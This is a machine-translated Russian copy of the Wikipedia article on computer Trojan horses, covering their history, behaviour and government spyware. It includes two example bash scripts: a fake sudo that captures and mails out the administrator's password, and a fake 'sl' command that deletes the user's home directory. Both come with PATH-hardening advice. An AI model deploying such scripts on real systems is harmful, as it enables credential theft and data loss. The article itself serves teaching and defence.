Jump to content

Троянский конь (компьютеры)

В вычислительной технике ( троянский конь или просто троян ) — это любое вредоносное ПО , которое вводит пользователей в заблуждение о своих истинных целях, маскируясь под стандартную программу. Этот термин происходит от древнегреческой истории о обманчивом Троянском коне , который привел к падению города Трои . [ 1 ]

Трояны обычно распространяются с помощью той или иной формы социальной инженерии . Например, когда пользователя обманом заставляют выполнить вложение к электронному письму , замаскированное под безобидный вид (например, заполнение обычной формы), или нажав на поддельную рекламу в социальных сетях или где-либо еще. Хотя их полезная нагрузка может быть любой, многие современные формы действуют как бэкдор , связываясь с контроллером, который затем может получить несанкционированный доступ к зараженному компьютеру. [ 2 ] Атаки программ-вымогателей часто осуществляются с использованием троянских программ.

В отличие от компьютерных вирусов и червей , трояны обычно не пытаются внедряться в другие файлы или иным образом распространяться. [ 3 ]

Использование термина

[ редактировать ]

Неясно, где и когда эта концепция и этот термин для нее были впервые использованы, но к 1971 году первое руководство по Unix предполагало, что читатели знают оба: [ 4 ]

Еще одно раннее упоминание содержится в отчете ВВС США 1974 года об анализе уязвимостей компьютерных систем Multics . [ 5 ]

Он стал популярным благодаря Кену Томпсону в его лекции на вручении премии Тьюринга в 1983 году «Размышления о доверии». [ 6 ] с подзаголовком: «В какой степени следует доверять утверждению, что программа не содержит троянских коней? Возможно, важнее доверять людям, написавшим программу». Он упомянул, что знал о возможном существовании троянов из отчета о безопасности Multics. [ 7 ] [ 8 ]

Поведение

[ редактировать ]

После установки трояны могут выполнять ряд вредоносных действий. Многие из них, как правило, связываются с одним или несколькими серверами управления и контроля (C2) через Интернет и ждут инструкций. Поскольку отдельные трояны обычно используют для этого определенного набора портов, обнаружить их может быть относительно просто. Более того, другие вредоносные программы потенциально могут «захватить» трояна, используя его в качестве прокси для вредоносных действий. [ 9 ]

В немецкоязычных странах шпионское ПО , используемое или созданное правительством, иногда называют программным обеспечением . Govware обычно представляет собой троянскую программу, используемую для перехвата сообщений с целевого компьютера. В некоторых странах, таких как Швейцария и Германия, существует правовая база, регулирующая использование такого программного обеспечения. [ 10 ] [ 11 ] Примеры правительственных троянов: Swiss MiniPanzer и MegaPanzer. [ 12 ] и немецкий «государственный троян» по прозвищу R2D2 . [ 10 ] Немецкое правительственное ПО работает, используя бреши в безопасности, неизвестные широкой публике, и получает доступ к данным смартфонов до того, как они будут зашифрованы с помощью других приложений. [ 13 ]

Благодаря популярности ботнетов среди хакеров и доступности рекламных сервисов, позволяющих авторам нарушать конфиденциальность своих пользователей, трояны становятся все более распространенными. Согласно опросу, проведенному BitDefender с января по июнь 2009 года, «растет число вредоносных программ троянского типа, на их долю приходится 83% глобальных вредоносных программ, обнаруженных в мире». Трояны связаны с червями, поскольку они распространяются с помощью червей и путешествуют вместе с ними по Интернету. [ 14 ] BitDefender заявил, что около 15% компьютеров являются членами ботнета, обычно привлекаемого троянской инфекцией. [ 15 ]

Недавние расследования показали, что метод «троянского коня» использовался для атаки на системы облачных вычислений . Троянская атака на облачные системы пытается внедрить в систему приложение или службу, которая может повлиять на облачные службы, изменив или остановив их функциональные возможности. Когда облачная система определяет атаки как законные, выполняется услуга или приложение, которое может повредить и заразить облачную систему. [ 16 ]

Пример sudo для Linux

[ редактировать ]

Троянский конь — это программа , которая якобы выполняет какую-то законную функцию, но при выполнении ставит под угрозу безопасность пользователя. [ 17 ] Простым примером является следующая вредоносная версия команды sudo в Linux . Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp). Если администратор находится в этом каталоге и выполняет sudo, то троянец может запуститься, скомпрометировав пароль администратора.

#!/usr/bin/env bash

# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.
stty -echo

# Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.
prompt_count=1
while [ $prompt_count -le 3 ]; do
    echo -n "[sudo] password for $(whoami): "
    read password_input
    echo
    sleep 3  # sudo will pause between repeated prompts
    prompt_count=$(( prompt_count + 1 ))
done

# Turn the character echo back on.
stty echo

echo $password_input | mail -s "$(whoami)'s password" [email protected]

# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm $0

exit 1  # sudo returns 1 with a failed password attempt

Чтобы предотвратить sudo Троянский конь , установи . запись в PATH переменная среды, которая должна быть расположена в конце. [ 18 ] Например: PATH=/usr/local/bin:/usr/bin:..

пример Linux ls

[ редактировать ]

Имея . где-то в PATH удобно, но есть подвох. [ 19 ] Другой пример — следующая вредоносная версия команды ls в Linux . Однако имя файла не ls; вместо этого это sl. Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp).

#!/usr/bin/env bash

# Remove the user's home directory, then remove self.
rm -fr ~ 2>/dev/null
rm $0

Чтобы злонамеренный программист не предвидел эту распространенную ошибку при наборе текста:

  1. пропускать . в PATH или
  2. alias sl=ls [ а ]

Яркие примеры

[ редактировать ]

Частные и государственные

[ редактировать ]

Общедоступно

[ редактировать ]

Обнаружено исследователями безопасности

[ редактировать ]

Капитализация

[ редактировать ]

Компьютерный термин «Троянский конь» происходит от легендарного Троянского коня древнего города Троя . По этой причине слово «Троян» часто пишется с заглавной буквы. Однако, хотя руководства по стилю и словари различаются, многие предлагают использовать «троян» в нижнем регистре для обычного использования. [ 30 ] [ 31 ]

См. также

[ редактировать ]
  1. ^ «Определение троянского коня» . Проверено 5 апреля 2012 г. Греческие солдаты, не сумевшие прорвать оборону города Трои в ходе многолетней войны, преподнесли городу в мирное предложение большого деревянного коня.
  2. ^ «Разница между вирусами, червями и троянами» . Центр безопасности Симантек . Broadcom Inc. Архивировано из оригинала 19 августа 2013 года . Проверено 29 марта 2020 г.
  3. ^ «Часто задаваемые вопросы (FAQ) VIRUS-L/comp.virus v2.00 (Вопрос B3: Что такое троянский конь?)» . 9 октября 1995 года. Архивировано из оригинала 5 августа 2020 года . Проверено 16 сентября 2019 г.
  4. ^ Томпсон, Кен; Ричи, Деннис М. «Руководство программиста Unix, 3 ноября 1971 г.» (PDF) . п. 5 . Проверено 28 марта 2020 г. Кроме того, нельзя изменить владельца файла с включенным битом set-user-ID, иначе можно создать троянских коней, способных злоупотреблять чужими файлами.
  5. ^ Каргер, Пенсильвания; Шелл, Р.Р., «Оценка безопасности Multiks: анализ уязвимостей, ESD-TR-74-193» (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , заархивировано из оригинала (PDF) 9 июля 2011 г. , получено 24 декабря 2017 г.
  6. ^ Кен Томпсон (1984). «Размышления о доверии» . Коммун. АКМ . 27 (8): 761–763. дои : 10.1145/358198.358210 . .
  7. ^ Пол А. Каргер; Роджер Р. Шелл (2002), «Тридцать лет спустя: уроки оценки безопасности Multics» (PDF) , ACSAC : 119–126
  8. ^ Каргер и Шелл писали, что Томпсон добавил эту ссылку в более позднюю версию своей конференции Тьюринга: Кен Томпсон (ноябрь 1989 г.), «О доверии», Unix Review , 7 (11): 70–74.
  9. ^ Крапанцано, Джейми (2003). Деконструкция SubSeven, любимого троянского коня (Отчет). Институт САНС . Проверено 10 мая 2021 г.
  10. ^ Перейти обратно: а б Бэзил Купа, «Троянский конь воскрес: о законности использования государственного шпионского ПО (Govware)» , LISS 2013, стр. 419–428.
  11. ^ «Häufig gestellte Fragen (Часто задаваемые вопросы)» . Федеральное министерство юстиции и полиции. Архивировано из оригинала 6 мая 2013 года.
  12. ^ Данн, Джон (27 августа 2009 г.). «Швейцарский программист рекламирует правительственный шпионский троян» . ТехМир . Архивировано из оригинала 26 января 2014 года . Проверено 10 января 2021 г.
  13. ^ «Федеральная полиция Германии использует вирус-троян, чтобы обойти шифрование телефона» . ДВ . Проверено 14 апреля 2018 г.
  14. ^ «Опрос BitDefender по вредоносному ПО и спаму показал, что электронные угрозы адаптируются к тенденциям поведения в Интернете» . БитДефендер . Архивировано из оригинала 8 августа 2009 года . Проверено 27 марта 2020 г.
  15. ^ Датта, Ганеша (7 августа 2014 г.). «Что такое трояны?» . СекурЭйд . Архивировано из оригинала 12 августа 2014 года . Проверено 27 марта 2020 г.
  16. ^ Канакер, Хасан; Карим, Надер Абдель; Аввад, Самер AB; Исмаил, Нурул ХА; Зраку, Джамал; Али, Абдулла М.Ф. Аль (20 декабря 2022 г.). «Обнаружение заражения троянскими конями в облачной среде с использованием машинного обучения» . Международный журнал интерактивных мобильных технологий . 16 (24): 81–106. дои : 10.3991/ijim.v16i24.35763 . ISSN   1865-7923 .
  17. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 42. ИСБН  0-8104-6267-2 .
  18. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 43. ИСБН  0-8104-6267-2 . Вышеупомянутый троянский конь работает только в том случае, если PATH пользователя настроен на поиск команд в текущем каталоге перед поиском в системных каталогах.
  19. ^ «Что плохого в том, чтобы иметь '.' в вашем $PATH?" . Пенн Инжиниринг . Проверено 28 ноября 2023 г. [Если] вы неуклюжая машинистка и однажды наберете «sl -l» вместо «ls -l», вы рискуете запустить «./sl», если таковой имеется. Какой-нибудь «умный» программист мог предвидеть распространенные ошибки при наборе текста и оставить программы с такими именами разбросанными по общедоступным каталогам. Остерегаться.
  20. ^ Сет, Кулаков (1998). «Это все еще троянский конь или действительный инструмент удаленного администрирования?» (Отчет). Институт САНС . Проверено 10 мая 2021 г.
  21. ^ «Мега-Панцер» . СоурсФордж . 21 сентября 2016 г.
  22. ^ «Мини-Панцер» . СоурсФордж . 18 сентября 2016 г.
  23. ^ «Что такое вирус Сова?» . Индия сегодня .
  24. ^ «Семейство зараженных троянами рекламных программ злоупотребляет службой специальных возможностей, чтобы устанавливать любые приложения, которые им нужны – блог Lookout» .
  25. ^ Нил, Дэйв (20 ноября 2015 г.). «Рекламное ПО-троян Shedun попадает в службу специальных возможностей Android» . Спрашивающий . Острые деловые СМИ. Архивировано из оригинала 22 ноября 2015 года . Проверено 27 марта 2020 г. {{cite web}}: CS1 maint: неподходящий URL ( ссылка )
  26. ^ «Lookout обнаруживает новое рекламное ПО, зараженное троянами; 20 тысяч популярных приложений попали под перекрестный огонь – блог Lookout» .
  27. ^ «Вредоносные программы Shuanet, ShiftyBug и Shedun могут автоматически рутировать ваш Android» . 5 ноября 2015 г.
  28. ^ Times, Tech (9 ноября 2015 г.). «Новое семейство вредоносных программ для Android, которые практически невозможно удалить: передайте привет Shedun, Shuanet и ShiftyBug» .
  29. ^ «Рекламное ПО для Android может установиться, даже если пользователи явно отвергают его» . 19 ноября 2015 г.
  30. ^ «троян» . Расширенный словарь Коллинза . Проверено 29 марта 2020 г.
  31. ^ «троянский конь» . Руководство по стилю Microsoft . Майкрософт . Проверено 29 марта 2020 г.

Примечания

[ редактировать ]
  1. ^ Поместите alias заявление в /etc/profile
[ редактировать ]
Arc.Ask3.Ru: конец переведенного документа.
Arc.Ask3.Ru
Номер скриншота №: 6fcb5169af3a9eb6fab72815846b3515__1720264140
URL1:https://arc.ask3.ru/arc/aa/6f/15/6fcb5169af3a9eb6fab72815846b3515.html
Заголовок, (Title) документа по адресу, URL1:
Trojan horse (computing) - Wikipedia
Данный printscreen веб страницы (снимок веб страницы, скриншот веб страницы), визуально-программная копия документа расположенного по адресу URL1 и сохраненная в файл, имеет: квалифицированную, усовершенствованную (подтверждены: метки времени, валидность сертификата), открепленную ЭЦП (приложена к данному файлу), что может быть использовано для подтверждения содержания и факта существования документа в этот момент времени. Права на данный скриншот принадлежат администрации Ask3.ru, использование в качестве доказательства только с письменного разрешения правообладателя скриншота. Администрация Ask3.ru не несет ответственности за информацию размещенную на данном скриншоте. Права на прочие зарегистрированные элементы любого права, изображенные на снимках принадлежат их владельцам. Качество перевода предоставляется как есть. Любые претензии, иски не могут быть предъявлены. Если вы не согласны с любым пунктом перечисленным выше, вы не можете использовать данный сайт и информация размещенную на нем (сайте/странице), немедленно покиньте данный сайт. В случае нарушения любого пункта перечисленного выше, штраф 55! (Пятьдесят пять факториал, Денежную единицу (имеющую самостоятельную стоимость) можете выбрать самостоятельно, выплаичвается товарами в течение 7 дней с момента нарушения.)